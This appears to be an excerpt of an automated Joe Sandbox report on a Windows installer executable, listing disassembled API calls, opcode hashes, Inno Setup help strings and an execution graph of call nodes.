                                                                                                    • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                    • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                                    • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                    • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                    • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                    • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                    • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                    • API String ID: 4190037839-2401316094
                                                                                                    • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                    • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                    • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                    • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                    • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                    • String ID:
                                                                                                    • API String ID: 1694776339-0
                                                                                                    • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                    • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                    • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                    • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                    APIs
                                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                      • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                      • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$DefaultSystem
                                                                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                    • API String ID: 1044490935-665933166
                                                                                                    • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                    • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                    • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                    • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                    • LocalFree.KERNEL32(007DA580,00000000,00401AB4), ref: 00401A1B
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,007DA580,00000000,00401AB4), ref: 00401A3A
                                                                                                    • LocalFree.KERNEL32(007DB580,?,00000000,00008000,007DA580,00000000,00401AB4), ref: 00401A79
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                    • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3782394904-0
                                                                                                    • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                    • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                    • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                    • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                    • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExitMessageProcess
                                                                                                    • String ID: Error$Runtime error at 00000000$9@
                                                                                                    • API String ID: 1220098344-1503883590
                                                                                                    • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                    • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                    • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                    • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 262959230-0
                                                                                                    • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                    • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                    • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                    • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                    • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CommandHandleLineModule
                                                                                                    • String ID: H%|$U1hd.@
                                                                                                    • API String ID: 2123368496-2448479167
                                                                                                    • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                    • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                    • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                    • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: )q@
                                                                                                    • API String ID: 3660427363-2284170586
                                                                                                    • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                    • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                                    • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                    • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                    Strings
                                                                                                    • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                    • Setup, xrefs: 00409CAD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                    • API String ID: 2030045667-3271211647
                                                                                                    • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                    • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                    • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                    • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 1458359878-0
                                                                                                    • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                    • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                    • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                    • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:16%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:4.7%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:83
                                                                                                    execution_graph 49969 40cd00 49970 40cd12 49969->49970 49971 40cd0d 49969->49971 49973 406f48 CloseHandle 49971->49973 49973->49970 49974 492848 49975 49287c 49974->49975 49976 49287e 49975->49976 49977 492892 49975->49977 50120 446f9c 32 API calls 49976->50120 49980 4928ce 49977->49980 49981 4928a1 49977->49981 49979 492887 Sleep 50040 4928c9 49979->50040 49986 49290a 49980->49986 49987 4928dd 49980->49987 50110 446ff8 49981->50110 49985 4928b0 49988 4928b8 FindWindowA 49985->49988 49992 492919 49986->49992 49993 492960 49986->49993 49989 446ff8 32 API calls 49987->49989 50114 447278 49988->50114 49991 4928ea 49989->49991 49995 4928f2 FindWindowA 49991->49995 50121 446f9c 32 API calls 49992->50121 49999 4929bc 49993->49999 50000 49296f 49993->50000 49997 447278 19 API calls 49995->49997 49996 492925 50122 446f9c 32 API calls 49996->50122 50053 492905 49997->50053 50007 492a18 49999->50007 50008 4929cb 49999->50008 50125 446f9c 32 API calls 50000->50125 50002 492932 50123 446f9c 32 API calls 50002->50123 50003 49297b 50126 446f9c 32 API calls 50003->50126 50006 49293f 50124 446f9c 32 API calls 50006->50124 50018 492a52 50007->50018 50019 492a27 50007->50019 50130 446f9c 32 API calls 50008->50130 50009 492988 50127 446f9c 32 API calls 50009->50127 50013 49294a SendMessageA 50017 447278 19 API calls 50013->50017 50014 4929d7 50131 446f9c 32 API calls 50014->50131 50016 492995 50128 446f9c 32 API calls 50016->50128 50017->50053 50027 492a61 50018->50027 50028 492aa0 50018->50028 50022 446ff8 32 API calls 50019->50022 50020 4929e4 50132 446f9c 32 API calls 50020->50132 50025 492a34 50022->50025 50024 4929a0 PostMessageA 50129 4470d0 19 API calls 50024->50129 50032 492a3c RegisterClipboardFormatA 50025->50032 50026 4929f1 50133 446f9c 32 API calls 50026->50133 50135 446f9c 32 API calls 50027->50135 50036 492aaf 50028->50036 50042 492af4 50028->50042 50033 447278 19 API calls 50032->50033 50033->50040 50034 4929fc SendNotifyMessageA 50134 4470d0 19 API calls 50034->50134 50035 492a6d 50136 446f9c 32 API calls 50035->50136 50138 446f9c 32 API calls 50036->50138 50160 403420 50040->50160 50041 492a7a 50137 446f9c 32 API calls 50041->50137 50047 492b48 50042->50047 50048 492b03 50042->50048 50043 492abb 50139 446f9c 32 API calls 50043->50139 50046 492a85 SendMessageA 50050 447278 19 API calls 50046->50050 50057 492baa 50047->50057 50058 492b57 50047->50058 50142 446f9c 32 API calls 50048->50142 50049 492ac8 50140 446f9c 32 API calls 50049->50140 50050->50053 50053->50040 50054 492b0f 50143 446f9c 32 API calls 50054->50143 50056 492ad3 PostMessageA 50141 4470d0 19 API calls 50056->50141 50065 492bb9 50057->50065 50066 492c31 50057->50066 50061 446ff8 32 API calls 50058->50061 50059 492b1c 50144 446f9c 32 API calls 50059->50144 50063 492b64 50061->50063 50146 42e394 SetErrorMode 50063->50146 50064 492b27 SendNotifyMessageA 50145 4470d0 19 API calls 50064->50145 50069 446ff8 32 API calls 50065->50069 50074 492c40 50066->50074 50075 492c66 50066->50075 50071 492bc8 50069->50071 50070 492b71 50072 492b87 GetLastError 50070->50072 50073 492b77 50070->50073 50149 446f9c 32 API calls 50071->50149 50076 447278 19 API calls 50072->50076 50077 447278 19 API calls 50073->50077 50154 446f9c 32 API calls 50074->50154 50084 492c98 50075->50084 50085 492c75 50075->50085 50078 492b85 50076->50078 50077->50078 50081 447278 19 API calls 50078->50081 50080 492c4a FreeLibrary 50155 4470d0 19 API calls 50080->50155 50081->50040 50093 492ca7 50084->50093 50099 492cdb 50084->50099 50089 446ff8 32 API calls 50085->50089 50086 492bdb GetProcAddress 50087 492c21 50086->50087 50088 492be7 50086->50088 50153 4470d0 19 API calls 50087->50153 50150 446f9c 32 API calls 50088->50150 50091 492c81 50089->50091 50097 492c89 CreateMutexA 50091->50097 50156 48ccc8 32 API calls 50093->50156 50094 492bf3 50151 446f9c 32 API calls 50094->50151 50097->50040 50098 492c00 50102 447278 19 API calls 50098->50102 50099->50040 50158 48ccc8 32 API calls 50099->50158 50101 492cb3 50103 492cc4 OemToCharBuffA 50101->50103 50104 492c11 50102->50104 50157 48cce0 19 API calls 50103->50157 50152 4470d0 19 API calls 50104->50152 50107 492cf6 50108 492d07 CharToOemBuffA 50107->50108 50159 48cce0 19 API calls 50108->50159 50111 447000 50110->50111 50164 436078 50111->50164 50113 44701f 50113->49985 50115 447280 50114->50115 50277 4363e0 VariantClear 50115->50277 50117 4472a3 50118 4472ba 50117->50118 50278 408c0c 18 API calls 50117->50278 50118->50040 50120->49979 50121->49996 50122->50002 50123->50006 50124->50013 50125->50003 50126->50009 50127->50016 50128->50024 50129->50053 50130->50014 50131->50020 50132->50026 50133->50034 50134->50040 50135->50035 50136->50041 50137->50046 50138->50043 50139->50049 50140->50056 50141->50053 50142->50054 50143->50059 50144->50064 50145->50040 50279 403738 50146->50279 50149->50086 50150->50094 50151->50098 50152->50053 50153->50053 50154->50080 50155->50040 50156->50101 50157->50040 50158->50107 50159->50040 50162 403426 50160->50162 50161 40344b 50162->50161 50163 402660 4 API calls 50162->50163 50163->50162 50165 436084 50164->50165 50175 4360a6 50164->50175 50165->50175 50184 408c0c 18 API calls 50165->50184 50166 436129 50193 408c0c 18 API calls 50166->50193 50168 436111 50188 403494 50168->50188 50169 436105 50169->50113 50170 4360f9 50179 403510 18 API calls 50170->50179 50171 4360ed 50185 403510 50171->50185 50172 43611d 50192 4040e8 32 API calls 50172->50192 50175->50166 50175->50168 50175->50169 50175->50170 50175->50171 50175->50172 50178 43613a 50178->50113 50183 436102 50179->50183 50181 436126 50181->50113 50183->50113 50184->50175 50194 4034e0 50185->50194 50189 403498 50188->50189 50190 4034ba 50189->50190 50191 402660 4 API calls 50189->50191 50190->50113 50191->50190 50192->50181 50193->50178 50199 4034bc 50194->50199 50196 4034f0 50204 403400 50196->50204 50200 4034c0 50199->50200 50201 4034dc 50199->50201 50208 402648 50200->50208 50201->50196 50205 403406 50204->50205 50206 40341f 50204->50206 50205->50206 50272 402660 50205->50272 50206->50113 50209 40264c 50208->50209 50212 402656 50208->50212 50214 402088 50209->50214 50210 402652 50210->50212 50225 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50210->50225 50212->50196 50215 40209c 50214->50215 50216 4020a1 50214->50216 50226 4019cc RtlInitializeCriticalSection 50215->50226 50218 4020c6 RtlEnterCriticalSection 50216->50218 50219 4020d0 50216->50219 50220 4020a5 50216->50220 50218->50219 50219->50220 50233 401f94 50219->50233 50220->50210 50223 4021f1 RtlLeaveCriticalSection 50224 4021fb 50223->50224 50224->50210 50225->50212 50227 4019f0 RtlEnterCriticalSection 50226->50227 50228 4019fa 50226->50228 50227->50228 50229 401a18 LocalAlloc 50228->50229 50230 401a32 50229->50230 50231 401a81 50230->50231 50232 401a77 RtlLeaveCriticalSection 50230->50232 50231->50216 50232->50231 50236 401fa4 50233->50236 50234 401fd0 50238 401ff4 50234->50238 50244 401db4 50234->50244 50236->50234 50236->50238 50239 401f0c 50236->50239 50238->50223 50238->50224 50248 40178c 50239->50248 50242 401f29 50242->50236 50245 401e02 50244->50245 50246 401dd2 50244->50246 50245->50246 50259 401d1c 50245->50259 50246->50238 50254 4017a8 50248->50254 50249 4014e4 LocalAlloc VirtualAlloc VirtualFree 50249->50254 50250 4017b2 50251 401678 VirtualAlloc 50250->50251 50255 4017be 50251->50255 50252 40180f 50252->50242 50258 401e80 9 API calls 50252->50258 50253 4013e0 LocalAlloc 50253->50254 50254->50249 50254->50250 50254->50252 50254->50253 50256 401803 50254->50256 50255->50252 50257 4015c0 VirtualFree 50256->50257 50257->50252 50258->50242 50260 401d2e 50259->50260 50261 401d51 50260->50261 50262 401d63 50260->50262 50263 401940 LocalAlloc VirtualFree VirtualFree 50261->50263 50264 401940 LocalAlloc VirtualFree VirtualFree 50262->50264 50265 401d61 50263->50265 50264->50265 50266 401d79 50265->50266 50267 401bf8 9 API calls 50265->50267 50266->50246 50268 401d88 50267->50268 50269 401da2 50268->50269 50270 401c4c 9 API calls 50268->50270 50271 401454 LocalAlloc 50269->50271 50270->50269 50271->50266 50273 402664 50272->50273 50274 40266e 50272->50274 50273->50274 50276 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50273->50276 50274->50206 50276->50274 50277->50117 50278->50118 50280 40373c LoadLibraryA 50279->50280 50280->50070 54071 498ba8 54129 